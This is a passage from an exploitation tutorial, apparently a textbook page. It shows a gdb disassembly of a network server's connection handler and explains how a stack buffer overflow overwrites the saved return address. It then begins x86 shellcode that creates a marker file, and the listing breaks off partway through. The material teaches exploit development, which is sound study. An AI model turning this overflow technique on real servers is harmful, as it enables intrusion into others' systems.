Graphics Programs Reference
In-Depth Information
0x08049307 <handle_connection+846>: mov DWORD PTR [esp+4],0x2
0x0804930f <handle_connection+854>: mov eax,DWORD PTR [ebp+8]
0x08049312 <handle_connection+857>: mov DWORD PTR [esp],eax
0x08049315 <handle_connection+860>: call 0x8048800 <shutdown@plt>
0x0804931a <handle_connection+865>: add esp,0x644
0x08049320 <handle_connection+871>: pop ebx
0x08049321 <handle_connection+872>: pop ebp
0x08049322 <handle_connection+873>: ret
End of assembler dump.
(gdb)
At the beginning of the function, the function prologue saves the current
values of the EBP and EBX registers by pushing them to the stack, and sets
EBP to the current value of ESP so it can be used as a point of reference for
accessing stack variables. Finally, 0x644 bytes are saved on the stack for these
stack variables by subtracting from ESP. The function epilogue at the end
restores ESP by adding 0x644 back to it and restores the saved values of EBX
and EBP by popping them from the stack back into the registers.
The overwrite instructions are actually found in the recv_line() func-
tion; however, they write to data in the handle_connection() stack frame, so
the overwrite itself happens in handle_connection() . The return address that
we overwrite is pushed to the stack when handle_connection() is called, so the
saved values for EBP and EBX pushed to the stack in the function prologue
will be between the return address and the corruptible buffer. This means
that EBP and EBX will get mangled when the function epilogue executes.
Since we don't gain control of the program's execution until the return
instruction, all the instructions between the overwrite and the return instruc-
tion must be executed. First, we need to assess how much collateral damage
is done by these extra instructions after the overwrite. The assembly instruct-
ion int3 creates the byte 0xcc , which is literally a debugging breakpoint.
The shellcode below uses an int3 instruction instead of exiting. This break-
point will be caught by GDB, allowing us to examine the exact state of the
program after the shellcode executes.
mark_break.s
BITS 32
; Mark the filesystem to prove you ran.
jmp short one
two:
pop ebx ; Filename
xor ecx, ecx
mov BYTE [ebx+7], cl ; Null terminate filename
push BYTE 0x5 ; Open()
pop eax
mov WORD cx, 0x441 ; O_WRONLY|O_APPEND|O_CREAT
xor edx, edx
mov WORD dx, 0x180 ; S_IRUSR|S_IWUSR
int 0x80 ; Open file to create it.
; eax = returned file descriptor
mov ebx, eax ; File descriptor to second arg
Search WWH ::




Custom Search